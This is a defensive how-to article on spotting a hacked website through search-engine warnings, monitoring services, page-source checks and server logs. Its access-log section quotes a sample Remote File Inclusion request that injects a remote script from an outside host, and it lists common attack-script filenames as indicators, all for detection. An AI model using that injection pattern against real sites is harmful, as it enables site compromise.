How to know if your website has been hacked

This article is part of a set that begins at:

• Website security: what to do after your site is hacked, and how to prevent it.

Warning signs that your website has malware

1) Google says "This site may harm your computer"

If Google or Yahoo! search engine result pages (SERPs) display a warning about your site, the most common cause is that your site was hacked. Please see the separate article about how to investigate and remove the Google / StopBadware warning message.

2) Visitors report getting viruses from your web pages

If visitors report to you that they get virus alerts or viruses from browsing your pages, your site is most likely hacked. Google and Yahoo! will start displaying a "badware" warning about your site soon, so see the article about it, above.

It is, however, possible for your pages to deliver viruses even if your site hasn't been hacked. This can occur when your pages pull some of their content from third parties such as advertisers, and they got hacked or someone slipped a malicious advertisement into their lineup. That scenario is also discussed in the article above. 

3) Visitors report being redirected to other websites

If people try to visit your website but wind up somewhere else instead, it's another sign your site is hacked. It's a similar situation to the two described above and will eventually earn a Google or Yahoo! "badware flag". See the article referenced above.

4) Your traffic decreases dramatically and suddenly

Most web surfers heed the "This site may harm your computer" warning and stay away. Those who continue to the site and get a virus or virus alert will leave immediately and not browse around. Either way, you'll see a drop in traffic. Anytime your traffic drops suddenly, investigate.

Places where you can monitor your site status

An important aspect of monitoring your site is to notice unusual changes, things that are different from normal, so make a habit of paying attention now to what is normal and usual, while your site is not hacked.

1) Each time you log into cPanel

Make a habit of checking the "Last login from:" box to make sure it shows your IP address from the last time you logged in.

2) Google Webmaster Central > Webmaster Tools

Google account (free) and login required. Google notifies you in Webmaster Tools if your site gets flagged as harmful. They often notify you by email, too, if they have your email address. You can also check your Google status anytime by typing this in a Google search box and viewing the results: site:yourdomain.com.

3) Google Safe Browsing Diagnostic database

Warning messages in Google search results are based on a Google database. You can view an up-to-date report from the database for any website by entering this URL in your browser address bar. Replace EXAMPLE.COM with the address of the website you want to check:

http://www.google.com/safebrowsing/diagnostic?site=EXAMPLE.COM

I wrote a few paragraphs about how to interpret the diagnostic report here.

4) StopBadware.org Clearinghouse database

If your site is flagged, you'll find a short summary of badware behavior found.

5) Norton Safe Web, from Symantec

Reports the threats, categorized by type, that have been found on websites. You can go directly to the report for any site with this address (replace EXAMPLE.COM):

http://safeweb.norton.com/report/show?url=EXAMPLE.COM

6) McAfee SiteAdvisor safety and outlink reports

The report describes how many emails they received after registering at a site, how spammy the emails were, whether the site has outlinks to bad websites, and whether they found viruses or spyware on pages or in downloads. Users sometimes post public comments with complaints or praise. SiteAdvisor is a way to learn what others think of your site. It doesn't seem to be updated very often, however, so it's not an early warning system.

7) W3C HTML Validator

If your pages usually validate ok, but suddenly stop validating, it can be a sign that new code was inserted at invalid locations in your files. The reported validation errors might be at exactly the locations where the injected code is.

8) Search engine result pages (SERPs)

At each of the popular search engines, watch for:

• Pages that the search engine says are on your site, but that you didn't put there.
• Text snippets that are wrong, containing text you did not put on the page.

9) When you browse your own site

Always use an up-to-date antivirus and antispyware program on your own PC so you'll be alerted if your website starts distributing malware. Use "real-time" scanning protection, which will catch malicious files as soon they are received. An on-demand scanner (such as a free online scanner, or a once-a-day manual scan) isn't enough. By the time you identify and quarantine the virus, the damage it was intended to cause might already be done.

Use your browser's View Source feature occasionally to inspect your page's HTML code for text injections of invisible iframes, JavaScript, and links to malicious websites. These are often the definitive indicators that the pages have been tampered with. The "badware investigation" article referenced above shows examples of what these things look like. They're just text. Once you know what to look for, they're easy to find.

It's a good idea also to check a few files on your server from time to time. Open your home page in your control panel's File Manager and inspect the HTML for the signs of tampering described above.

Whenever you are viewing a list of the files on your server (such as in cPanel > File Manager or by FTP), be alert for file names you don't recognize or sizes that are obviously wrong (such as a size of 0 for a file you know should be bigger).

The files on your server should never be different from what they were when you originally uploaded them. A file getting modified on your server without your permission is not normal. If it happens at all, it is an indication that something is wrong.

10) HTTP access log

This log records the requests for pages and other files from your site.

If there are successful requests (HTTP result code 200) for files you didn't put on the site, it's suspicious. It's even more suspicious if the filenames are variations of these often-used names for hack scripts: id.txt, cmd.txt, safe.txt, r57.txt, test.txt, echo.txt, php.txt, load.txt, or mic.txt.

Don't panic just because you find mentions of those filenames. You probably will find them. It matters where the names appear. Here are two different types of requests:

1. This one is a "Remote File Inclusion" (RFI) attack on your site. The GET command is requesting your index.php. It is trying to use the "query string" (the part after the first question mark) to inject safe.txt from the other site into your site. This is cause for concern because if it succeeds, your site will be hacked. However, this log line does not mean it has succeeded. It is just an attempt, and it is normal to find many of these attempts in your logs:

GET /blog/index.php?article=http://famousuniversity.com/user/safe.txt?

2. If the attack on your site does succeed (which you cannot determine from your log data alone), here is what famousuniversity will see in their log. This is a sign, to them, that they have been hacked. This GET is requesting safe.txt. If the result code is 200 (Success), it means the file was served, so it must be on the server. If they know that a file called safe.txt shouldn't be there, it means they were hacked and it was put there by somebody else, so they should find and examine the file. It is usually a PHP script intended to be used in attacks on other sites. I use famousuniversity as an example because my site actually has been attacked with scripts hosted at famous universities whose user accounts were compromised. It happens.

GET /user/safe.txt

As demonstrated in example 1, your access log is the place to learn how your site is being attacked, whether successfully or not, so you can learn what things you need to defend against.

Near-misses are good to learn from. If you find an attack that did not succeed in doing harm but did return a result code of 200 (meaning the server accepted the request and sent a file), it is a good idea to determine the malicious feature of the attack code and revise your .htaccess to block those types of requests. The goal should be for every known type of attack to get a 403 Forbidden result instead of 200. That will mean that your server rejected the request "at the front door", and the attack never had the opportunity to do harm. The Website Security article linked at the top of this page has some specific methods for this type of request blocking.

Your HTTP and FTP access logs (see the next section) are usually available for download at cPanel > Raw Log Manager. The log files are usually stored outside public_html, sometimes in a folder called /logs, which you can find with cPanel > File Manager or with FTP.

11) FTP access log

Unauthorized users, IP addresses, or file transfers in your FTP log are proof that your site is compromised.

Questions are welcome in the discussion forum.